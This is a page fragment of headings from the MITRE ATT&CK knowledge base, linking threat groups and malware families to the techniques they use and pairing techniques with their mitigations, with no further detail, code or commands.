<h3 id="_apt30_g0013_uses_backspace_s0031"><a class="anchor" href="#_apt30_g0013_uses_backspace_s0031"></a><a class="link" href="#_apt30_g0013_uses_backspace_s0031">APT30 (G0013) uses BACKSPACE (S0031)</a></h3>
</div>
<div class="sect2">
<h3 id="_applescript_mitigation_t1155_mitigates_applescript_t1155"><a class="anchor" href="#_applescript_mitigation_t1155_mitigates_applescript_t1155"></a><a class="link" href="#_applescript_mitigation_t1155_mitigates_applescript_t1155">AppleScript Mitigation (T1155) mitigates AppleScript (T1155)</a></h3>
</div>
<div class="sect2">
<h3 id="_unknown_logger_s0130_uses_replication_through_removable_media_t1091"><a class="anchor" href="#_unknown_logger_s0130_uses_replication_through_removable_media_t1091"></a><a class="link" href="#_unknown_logger_s0130_uses_replication_through_removable_media_t1091">Unknown Logger (S0130) uses Replication Through Removable Media (T1091)</a></h3>
</div>
<div class="sect2">
<h3 id="_powershell_mitigation_t1086_mitigates_powershell_t1086"><a class="anchor" href="#_powershell_mitigation_t1086_mitigates_powershell_t1086"></a><a class="link" href="#_powershell_mitigation_t1086_mitigates_powershell_t1086">PowerShell Mitigation (T1086) mitigates PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt12_g0005_uses_riptide_s0003"><a class="anchor" href="#_apt12_g0005_uses_riptide_s0003"></a><a class="link" href="#_apt12_g0005_uses_riptide_s0003">APT12 (G0005) uses RIPTIDE (S0003)</a></h3>
</div>
<div class="sect2">
<h3 id="_remotecmd_s0166_uses_remote_services_t1021"><a class="anchor" href="#_remotecmd_s0166_uses_remote_services_t1021"></a><a class="link" href="#_remotecmd_s0166_uses_remote_services_t1021">RemoteCMD (S0166) uses Remote Services (T1021)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_valid_accounts_t1078"><a class="anchor" href="#_apt28_g0007_uses_valid_accounts_t1078"></a><a class="link" href="#_apt28_g0007_uses_valid_accounts_t1078">APT28 (G0007) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_pteranodon_s0147_uses_rundll32_t1085"><a class="anchor" href="#_pteranodon_s0147_uses_rundll32_t1085"></a><a class="link" href="#_pteranodon_s0147_uses_rundll32_t1085">Pteranodon (S0147) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_network_service_scanning_mitigation_t1046_mitigates_network_service_scanning_t1046"><a class="anchor" href="#_network_service_scanning_mitigation_t1046_mitigates_network_service_scanning_t1046"></a><a class="link" href="#_network_service_scanning_mitigation_t1046_mitigates_network_service_scanning_t1046">Network Service Scanning Mitigation (T1046) mitigates Network Service Scanning (T1046)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_psexec_s0029"><a class="anchor" href="#_dragonfly_g0035_uses_psexec_s0029"></a><a class="link" href="#_dragonfly_g0035_uses_psexec_s0029">Dragonfly (G0035) uses PsExec (S0029)</a></h3>
</div>
<div class="sect2">
<h3 id="_carbanak_g0008_uses_netsh_s0108"><a class="anchor" href="#_carbanak_g0008_uses_netsh_s0108"></a><a class="link" href="#_carbanak_g0008_uses_netsh_s0108">Carbanak (G0008) uses netsh (S0108)</a></h3>
</div>
<div class="sect2">
<h3 id="_putter_panda_g0024_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_putter_panda_g0024_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_putter_panda_g0024_uses_registry_run_keys_start_folder_t1060">Putter Panda (G0024) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_prikormka_s0113_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_prikormka_s0113_uses_system_network_configuration_discovery_t1016">Prikormka (S0113) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_httpbrowser_s0070_uses_dll_side_loading_t1073"><a class="anchor" href="#_httpbrowser_s0070_uses_dll_side_loading_t1073"></a><a class="link" href="#_httpbrowser_s0070_uses_dll_side_loading_t1073">HTTPBrowser (S0070) uses DLL Side-Loading (T1073)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonok_g0017_uses_plugx_s0013"><a class="anchor" href="#_dragonok_g0017_uses_plugx_s0013"></a><a class="link" href="#_dragonok_g0017_uses_plugx_s0013">DragonOK (G0017) uses PlugX (S0013)</a></h3>
</div>
<div class="sect2">
<h3 id="_sykipot_s0018_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_sykipot_s0018_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_sykipot_s0018_uses_system_network_connections_discovery_t1049">Sykipot (S0018) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_powruner_s0184_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_powruner_s0184_uses_system_network_configuration_discovery_t1016">POWRUNER (S0184) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_fakem_s0076_uses_data_obfuscation_t1001"><a class="anchor" href="#_fakem_s0076_uses_data_obfuscation_t1001"></a><a class="link" href="#_fakem_s0076_uses_data_obfuscation_t1001">FakeM (S0076) uses Data Obfuscation (T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_callme_s0077_uses_remote_file_copy_t1105"><a class="anchor" href="#_callme_s0077_uses_remote_file_copy_t1105"></a><a class="link" href="#_callme_s0077_uses_remote_file_copy_t1105">CallMe (S0077) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_psylo_s0078_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_psylo_s0078_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_psylo_s0078_uses_file_and_directory_discovery_t1083">Psylo (S0078) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_process_discovery_t1057"><a class="anchor" href="#_advstoreshell_s0045_uses_process_discovery_t1057"></a><a class="link" href="#_advstoreshell_s0045_uses_process_discovery_t1057">ADVSTORESHELL (S0045) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_suckfly_g0039_uses_network_service_scanning_t1046"><a class="anchor" href="#_suckfly_g0039_uses_network_service_scanning_t1046"></a><a class="link" href="#_suckfly_g0039_uses_network_service_scanning_t1046">Suckfly (G0039) uses Network Service Scanning (T1046)</a></h3>
</div>
<div class="sect2">
<h3 id="_cozycar_s0046_uses_web_service_t1102"><a class="anchor" href="#_cozycar_s0046_uses_web_service_t1102"></a><a class="link" href="#_cozycar_s0046_uses_web_service_t1102">CozyCar (S0046) uses Web Service (T1102)</a></h3>
</div>
<div class="sect2">
<h3 id="_sowbug_g0054_uses_felismus_s0171"><a class="anchor" href="#_sowbug_g0054_uses_felismus_s0171"></a><a class="link" href="#_sowbug_g0054_uses_felismus_s0171">Sowbug (G0054) uses Felismus (S0171)</a></h3>
</div>
<div class="sect2">
<h3 id="_sslmm_s0058_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_sslmm_s0058_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_sslmm_s0058_uses_system_owner_user_discovery_t1033">SslMM (S0058) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_data_from_removable_media_t1025"><a class="anchor" href="#_apt28_g0007_uses_data_from_removable_media_t1025"></a><a class="link" href="#_apt28_g0007_uses_data_from_removable_media_t1025">APT28 (G0007) uses Data from Removable Media (T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_clear_command_history_mitigation_t1146_mitigates_clear_command_history_t1146"><a class="anchor" href="#_clear_command_history_mitigation_t1146_mitigates_clear_command_history_t1146"></a><a class="link" href="#_clear_command_history_mitigation_t1146_mitigates_clear_command_history_t1146">Clear Command History Mitigation (T1146) mitigates Clear Command History (T1146)</a></h3>
</div>
<div class="sect2">
<h3 id="_komplex_s0162_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_komplex_s0162_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_komplex_s0162_uses_standard_application_layer_protocol_t1071">Komplex (S0162) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_process_discovery_t1057"><a class="anchor" href="#_powruner_s0184_uses_process_discovery_t1057"></a><a class="link" href="#_powruner_s0184_uses_process_discovery_t1057">POWRUNER (S0184) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_komplex_s0162_uses_launch_agent_t1159"><a class="anchor" href="#_komplex_s0162_uses_launch_agent_t1159"></a><a class="link" href="#_komplex_s0162_uses_launch_agent_t1159">Komplex (S0162) uses Launch Agent (T1159)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_glooxmail_s0026"><a class="anchor" href="#_apt1_g0006_uses_glooxmail_s0026"></a><a class="link" href="#_apt1_g0006_uses_glooxmail_s0026">APT1 (G0006) uses GLOOXMAIL (S0026)</a></h3>
</div>
<div class="sect2">
<h3 id="_custom_cryptographic_protocol_mitigation_t1024_mitigates_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_custom_cryptographic_protocol_mitigation_t1024_mitigates_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_custom_cryptographic_protocol_mitigation_t1024_mitigates_custom_cryptographic_protocol_t1024">Custom Cryptographic Protocol Mitigation (T1024) mitigates Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_crimson_s0115_uses_email_collection_t1114"><a class="anchor" href="#_crimson_s0115_uses_email_collection_t1114"></a><a class="link" href="#_crimson_s0115_uses_email_collection_t1114">Crimson (S0115) uses Email Collection (T1114)</a></h3>
</div>
<div class="sect2">
<h3 id="_crimson_s0115_uses_remote_file_copy_t1105"><a class="anchor" href="#_crimson_s0115_uses_remote_file_copy_t1105"></a><a class="link" href="#_crimson_s0115_uses_remote_file_copy_t1105">Crimson (S0115) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_clipboard_data_t1115"><a class="anchor" href="#_helminth_s0170_uses_clipboard_data_t1115"></a><a class="link" href="#_helminth_s0170_uses_clipboard_data_t1115">Helminth (S0170) uses Clipboard Data (T1115)</a></h3>
</div>
<div class="sect2">
<h3 id="_misdat_s0083_uses_masquerading_t1036"><a class="anchor" href="#_misdat_s0083_uses_masquerading_t1036"></a><a class="link" href="#_misdat_s0083_uses_masquerading_t1036">Misdat (S0083) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_s_type_s0085_uses_data_encoding_t1132"><a class="anchor" href="#_s_type_s0085_uses_data_encoding_t1132"></a><a class="link" href="#_s_type_s0085_uses_data_encoding_t1132">S-Type (S0085) uses Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_flame_s0143_uses_screen_capture_t1113"><a class="anchor" href="#_flame_s0143_uses_screen_capture_t1113"></a><a class="link" href="#_flame_s0143_uses_screen_capture_t1113">Flame (S0143) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_standard_non_application_layer_protocol_t1095"><a class="anchor" href="#_apt3_g0022_uses_standard_non_application_layer_protocol_t1095"></a><a class="link" href="#_apt3_g0022_uses_standard_non_application_layer_protocol_t1095">APT3 (G0022) uses Standard Non-Application Layer Protocol (T1095)</a></h3>
</div>
<div class="sect2">
<h3 id="_standard_non_application_layer_protocol_mitigation_t1095_mitigates_standard_non_application_layer_protocol_t1095"><a class="anchor" href="#_standard_non_application_layer_protocol_mitigation_t1095_mitigates_standard_non_application_layer_protocol_t1095"></a><a class="link" href="#_standard_non_application_layer_protocol_mitigation_t1095_mitigates_standard_non_application_layer_protocol_t1095">Standard Non-Application Layer Protocol Mitigation (T1095) mitigates Standard Non-Application Layer Protocol (T1095)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_access_token_manipulation_t1134"><a class="anchor" href="#_apt28_g0007_uses_access_token_manipulation_t1134"></a><a class="link" href="#_apt28_g0007_uses_access_token_manipulation_t1134">APT28 (G0007) uses Access Token Manipulation (T1134)</a></h3>
</div>
<div class="sect2">
<h3 id="_usbstealer_s0136_uses_automated_exfiltration_t1020"><a class="anchor" href="#_usbstealer_s0136_uses_automated_exfiltration_t1020"></a><a class="link" href="#_usbstealer_s0136_uses_automated_exfiltration_t1020">USBStealer (S0136) uses Automated Exfiltration (T1020)</a></h3>
</div>
<div class="sect2">
<h3 id="_net_crawler_s0056_uses_brute_force_t1110"><a class="anchor" href="#_net_crawler_s0056_uses_brute_force_t1110"></a><a class="link" href="#_net_crawler_s0056_uses_brute_force_t1110">Net Crawler (S0056) uses Brute Force (T1110)</a></h3>
</div>
<div class="sect2">
<h3 id="_derusbi_s0021_uses_standard_non_application_layer_protocol_t1095"><a class="anchor" href="#_derusbi_s0021_uses_standard_non_application_layer_protocol_t1095"></a><a class="link" href="#_derusbi_s0021_uses_standard_non_application_layer_protocol_t1095">Derusbi (S0021) uses Standard Non-Application Layer Protocol (T1095)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_meek_s0175"><a class="anchor" href="#_apt29_g0016_uses_meek_s0175"></a><a class="link" href="#_apt29_g0016_uses_meek_s0175">APT29 (G0016) uses meek (S0175)</a></h3>
</div>
<div class="sect2">
<h3 id="_tinyzbot_s0004_uses_input_capture_t1056"><a class="anchor" href="#_tinyzbot_s0004_uses_input_capture_t1056"></a><a class="link" href="#_tinyzbot_s0004_uses_input_capture_t1056">TinyZBot (S0004) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_rundll32_t1085"><a class="anchor" href="#_rtm_s0148_uses_rundll32_t1085"></a><a class="link" href="#_rtm_s0148_uses_rundll32_t1085">RTM (S0148) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_net_s0039_uses_permission_groups_discovery_t1069"><a class="anchor" href="#_net_s0039_uses_permission_groups_discovery_t1069"></a><a class="link" href="#_net_s0039_uses_permission_groups_discovery_t1069">Net (S0039) uses Permission Groups Discovery (T1069)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_powruner_s0184_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_powruner_s0184_uses_system_owner_user_discovery_t1033">POWRUNER (S0184) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_system_time_discovery_t1124"><a class="anchor" href="#_shamoon_s0140_uses_system_time_discovery_t1124"></a><a class="link" href="#_shamoon_s0140_uses_system_time_discovery_t1124">Shamoon (S0140) uses System Time Discovery (T1124)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_application_window_discovery_t1010"><a class="anchor" href="#_duqu_s0038_uses_application_window_discovery_t1010"></a><a class="link" href="#_duqu_s0038_uses_application_window_discovery_t1010">Duqu (S0038) uses Application Window Discovery (T1010)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_rtm_s0148_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_rtm_s0148_uses_custom_cryptographic_protocol_t1024">RTM (S0148) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_halfbaked_s0151_uses_windows_management_instrumentation_t1047"><a class="anchor" href="#_halfbaked_s0151_uses_windows_management_instrumentation_t1047"></a><a class="link" href="#_halfbaked_s0151_uses_windows_management_instrumentation_t1047">HALFBAKED (S0151) uses Windows Management Instrumentation (T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_system_network_connections_discovery_mitigation_t1049_mitigates_system_network_connections_discovery_t1049"><a class="anchor" href="#_system_network_connections_discovery_mitigation_t1049_mitigates_system_network_connections_discovery_t1049"></a><a class="link" href="#_system_network_connections_discovery_mitigation_t1049_mitigates_system_network_connections_discovery_t1049">System Network Connections Discovery Mitigation (T1049) mitigates System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_credential_dumping_t1003"><a class="anchor" href="#_oilrig_g0049_uses_credential_dumping_t1003"></a><a class="link" href="#_oilrig_g0049_uses_credential_dumping_t1003">OilRig (G0049) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin5_g0053_uses_redundant_access_t1108"><a class="anchor" href="#_fin5_g0053_uses_redundant_access_t1108"></a><a class="link" href="#_fin5_g0053_uses_redundant_access_t1108">FIN5 (G0053) uses Redundant Access (T1108)</a></h3>
</div>
<div class="sect2">
<h3 id="_netsh_helper_dll_mitigation_t1128_mitigates_netsh_helper_dll_t1128"><a class="anchor" href="#_netsh_helper_dll_mitigation_t1128_mitigates_netsh_helper_dll_t1128"></a><a class="link" href="#_netsh_helper_dll_mitigation_t1128_mitigates_netsh_helper_dll_t1128">Netsh Helper DLL Mitigation (T1128) mitigates Netsh Helper DLL (T1128)</a></h3>
</div>
<div class="sect2">
<h3 id="_neteagle_s0034_uses_standard_non_application_layer_protocol_t1095"><a class="anchor" href="#_neteagle_s0034_uses_standard_non_application_layer_protocol_t1095"></a><a class="link" href="#_neteagle_s0034_uses_standard_non_application_layer_protocol_t1095">NETEAGLE (S0034) uses Standard Non-Application Layer Protocol (T1095)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_masquerading_t1036"><a class="anchor" href="#_remsec_s0125_uses_masquerading_t1036"></a><a class="link" href="#_remsec_s0125_uses_masquerading_t1036">Remsec (S0125) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_net_s0039_uses_network_share_discovery_t1135"><a class="anchor" href="#_net_s0039_uses_network_share_discovery_t1135"></a><a class="link" href="#_net_s0039_uses_network_share_discovery_t1135">Net (S0039) uses Network Share Discovery (T1135)</a></h3>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_redleaves_s0153_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_redleaves_s0153_uses_standard_cryptographic_protocol_t1032">RedLeaves (S0153) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_windows_admin_shares_t1077"><a class="anchor" href="#_ke3chang_g0004_uses_windows_admin_shares_t1077"></a><a class="link" href="#_ke3chang_g0004_uses_windows_admin_shares_t1077">Ke3chang (G0004) uses Windows Admin Shares (T1077)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_commonly_used_port_t1043"><a class="anchor" href="#_cobalt_strike_s0154_uses_commonly_used_port_t1043"></a><a class="link" href="#_cobalt_strike_s0154_uses_commonly_used_port_t1043">Cobalt Strike (S0154) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_naikon_g0019_uses_sys10_s0060"><a class="anchor" href="#_naikon_g0019_uses_sys10_s0060"></a><a class="link" href="#_naikon_g0019_uses_sys10_s0060">Naikon (G0019) uses Sys10 (S0060)</a></h3>
</div>
<div class="sect2">
<h3 id="_owaauth_s0072_uses_masquerading_t1036"><a class="anchor" href="#_owaauth_s0072_uses_masquerading_t1036"></a><a class="link" href="#_owaauth_s0072_uses_masquerading_t1036">OwaAuth (S0072) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_elmer_s0064_uses_process_discovery_t1057"><a class="anchor" href="#_elmer_s0064_uses_process_discovery_t1057"></a><a class="link" href="#_elmer_s0064_uses_process_discovery_t1057">ELMER (S0064) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_scheduled_task_t1053"><a class="anchor" href="#_powruner_s0184_uses_scheduled_task_t1053"></a><a class="link" href="#_powruner_s0184_uses_scheduled_task_t1053">POWRUNER (S0184) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_communication_through_removable_media_t1092"><a class="anchor" href="#_apt28_g0007_uses_communication_through_removable_media_t1092"></a><a class="link" href="#_apt28_g0007_uses_communication_through_removable_media_t1092">APT28 (G0007) uses Communication Through Removable Media (T1092)</a></h3>
</div>
<div class="sect2">
<h3 id="_windshield_s0155_uses_standard_non_application_layer_protocol_t1095"><a class="anchor" href="#_windshield_s0155_uses_standard_non_application_layer_protocol_t1095"></a><a class="link" href="#_windshield_s0155_uses_standard_non_application_layer_protocol_t1095">WINDSHIELD (S0155) uses Standard Non-Application Layer Protocol (T1095)</a></h3>
</div>
<div class="sect2">
<h3 id="_comrat_s0126_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_comrat_s0126_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_comrat_s0126_uses_standard_application_layer_protocol_t1071">ComRAT (S0126) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_dyre_s0024_uses_security_software_discovery_t1063"><a class="anchor" href="#_dyre_s0024_uses_security_software_discovery_t1063"></a><a class="link" href="#_dyre_s0024_uses_security_software_discovery_t1063">Dyre (S0024) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_schtasks_s0111_uses_scheduled_task_t1053"><a class="anchor" href="#_schtasks_s0111_uses_scheduled_task_t1053"></a><a class="link" href="#_schtasks_s0111_uses_scheduled_task_t1053">schtasks (S0111) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_cozycar_s0046_uses_scheduled_task_t1053"><a class="anchor" href="#_cozycar_s0046_uses_scheduled_task_t1053"></a><a class="link" href="#_cozycar_s0046_uses_scheduled_task_t1053">CozyCar (S0046) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_nbtstat_s0102"><a class="anchor" href="#_turla_g0010_uses_nbtstat_s0102"></a><a class="link" href="#_turla_g0010_uses_nbtstat_s0102">Turla (G0010) uses nbtstat (S0102)</a></h3>
</div>
<div class="sect2">
<h3 id="_automated_collection_mitigation_t1119_mitigates_automated_collection_t1119"><a class="anchor" href="#_automated_collection_mitigation_t1119_mitigates_automated_collection_t1119"></a><a class="link" href="#_automated_collection_mitigation_t1119_mitigates_automated_collection_t1119">Automated Collection Mitigation (T1119) mitigates Automated Collection (T1119)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_command_line_interface_t1059"><a class="anchor" href="#_lazarus_group_g0032_uses_command_line_interface_t1059"></a><a class="link" href="#_lazarus_group_g0032_uses_command_line_interface_t1059">Lazarus Group (G0032) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_input_prompt_mitigation_t1141_mitigates_input_prompt_t1141"><a class="anchor" href="#_input_prompt_mitigation_t1141_mitigates_input_prompt_t1141"></a><a class="link" href="#_input_prompt_mitigation_t1141_mitigates_input_prompt_t1141">Input Prompt Mitigation (T1141) mitigates Input Prompt (T1141)</a></h3>
</div>
<div class="sect2">
<h3 id="_wingbird_s0176_uses_security_software_discovery_t1063"><a class="anchor" href="#_wingbird_s0176_uses_security_software_discovery_t1063"></a><a class="link" href="#_wingbird_s0176_uses_security_software_discovery_t1063">Wingbird (S0176) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_unknown_logger_s0130_uses_disabling_security_tools_t1089"><a class="anchor" href="#_unknown_logger_s0130_uses_disabling_security_tools_t1089"></a><a class="link" href="#_unknown_logger_s0130_uses_disabling_security_tools_t1089">Unknown Logger (S0130) uses Disabling Security Tools (T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_helminth_s0170"><a class="anchor" href="#_apt34_g0057_uses_helminth_s0170"></a><a class="link" href="#_apt34_g0057_uses_helminth_s0170">APT34 (G0057) uses Helminth (S0170)</a></h3>
</div>
<div class="sect2">
<h3 id="_hacking_team_uefi_rootkit_s0047_uses_system_firmware_t1019"><a class="anchor" href="#_hacking_team_uefi_rootkit_s0047_uses_system_firmware_t1019"></a><a class="link" href="#_hacking_team_uefi_rootkit_s0047_uses_system_firmware_t1019">Hacking Team UEFI Rootkit (S0047) uses System Firmware (T1019)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_process_discovery_t1057"><a class="anchor" href="#_duqu_s0038_uses_process_discovery_t1057"></a><a class="link" href="#_duqu_s0038_uses_process_discovery_t1057">Duqu (S0038) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_streamex_s0142_uses_system_information_discovery_t1082"><a class="anchor" href="#_streamex_s0142_uses_system_information_discovery_t1082"></a><a class="link" href="#_streamex_s0142_uses_system_information_discovery_t1082">StreamEx (S0142) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_data_from_removable_media_mitigation_t1025_mitigates_data_from_removable_media_t1025"><a class="anchor" href="#_data_from_removable_media_mitigation_t1025_mitigates_data_from_removable_media_t1025"></a><a class="link" href="#_data_from_removable_media_mitigation_t1025_mitigates_data_from_removable_media_t1025">Data from Removable Media Mitigation (T1025) mitigates Data from Removable Media (T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_1314_g0028_uses_windows_admin_shares_t1077"><a class="anchor" href="#_threat_group_1314_g0028_uses_windows_admin_shares_t1077"></a><a class="link" href="#_threat_group_1314_g0028_uses_windows_admin_shares_t1077">Threat Group-1314 (G0028) uses Windows Admin Shares (T1077)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_scheduled_task_t1053"><a class="anchor" href="#_shamoon_s0140_uses_scheduled_task_t1053"></a><a class="link" href="#_shamoon_s0140_uses_scheduled_task_t1053">Shamoon (S0140) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_gazer_s0168_uses_file_deletion_t1107"><a class="anchor" href="#_gazer_s0168_uses_file_deletion_t1107"></a><a class="link" href="#_gazer_s0168_uses_file_deletion_t1107">Gazer (S0168) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_hypervisor_mitigation_t1062_mitigates_hypervisor_t1062"><a class="anchor" href="#_hypervisor_mitigation_t1062_mitigates_hypervisor_t1062"></a><a class="link" href="#_hypervisor_mitigation_t1062_mitigates_hypervisor_t1062">Hypervisor Mitigation (T1062) mitigates Hypervisor (T1062)</a></h3>
</div>
<div class="sect2">
<h3 id="_hi_zor_s0087_uses_regsvr32_t1117"><a class="anchor" href="#_hi_zor_s0087_uses_regsvr32_t1117"></a><a class="link" href="#_hi_zor_s0087_uses_regsvr32_t1117">Hi-Zor (S0087) uses Regsvr32 (T1117)</a></h3>
</div>
<div class="sect2">
<h3 id="_poseidon_group_g0033_uses_powershell_t1086"><a class="anchor" href="#_poseidon_group_g0033_uses_powershell_t1086"></a><a class="link" href="#_poseidon_group_g0033_uses_powershell_t1086">Poseidon Group (G0033) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_shotput_s0063_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_shotput_s0063_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_shotput_s0063_uses_system_network_connections_discovery_t1049">SHOTPUT (S0063) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_gazer_s0168_uses_scheduled_task_t1053"><a class="anchor" href="#_gazer_s0168_uses_scheduled_task_t1053"></a><a class="link" href="#_gazer_s0168_uses_scheduled_task_t1053">Gazer (S0168) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_forced_authentication_t1187"><a class="anchor" href="#_dragonfly_g0035_uses_forced_authentication_t1187"></a><a class="link" href="#_dragonfly_g0035_uses_forced_authentication_t1187">Dragonfly (G0035) uses Forced Authentication (T1187)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_bronze_butler_g0060_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_bronze_butler_g0060_uses_registry_run_keys_start_folder_t1060">BRONZE BUTLER (G0060) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_dynamic_data_exchange_t1173"><a class="anchor" href="#_apt28_g0007_uses_dynamic_data_exchange_t1173"></a><a class="link" href="#_apt28_g0007_uses_dynamic_data_exchange_t1173">APT28 (G0007) uses Dynamic Data Exchange (T1173)</a></h3>
</div>
<div class="sect2">
<h3 id="_lc_main_hijacking_mitigation_t1149_mitigates_lc_main_hijacking_t1149"><a class="anchor" href="#_lc_main_hijacking_mitigation_t1149_mitigates_lc_main_hijacking_t1149"></a><a class="link" href="#_lc_main_hijacking_mitigation_t1149_mitigates_lc_main_hijacking_t1149">LC_MAIN Hijacking Mitigation (T1149) mitigates LC_MAIN Hijacking (T1149)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_exploitation_of_vulnerability_t1068"><a class="anchor" href="#_fin6_g0037_uses_exploitation_of_vulnerability_t1068"></a><a class="link" href="#_fin6_g0037_uses_exploitation_of_vulnerability_t1068">FIN6 (G0037) uses Exploitation of Vulnerability (T1068)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_timestomp_t1099"><a class="anchor" href="#_lazarus_group_g0032_uses_timestomp_t1099"></a><a class="link" href="#_lazarus_group_g0032_uses_timestomp_t1099">Lazarus Group (G0032) uses Timestomp (T1099)</a></h3>
</div>
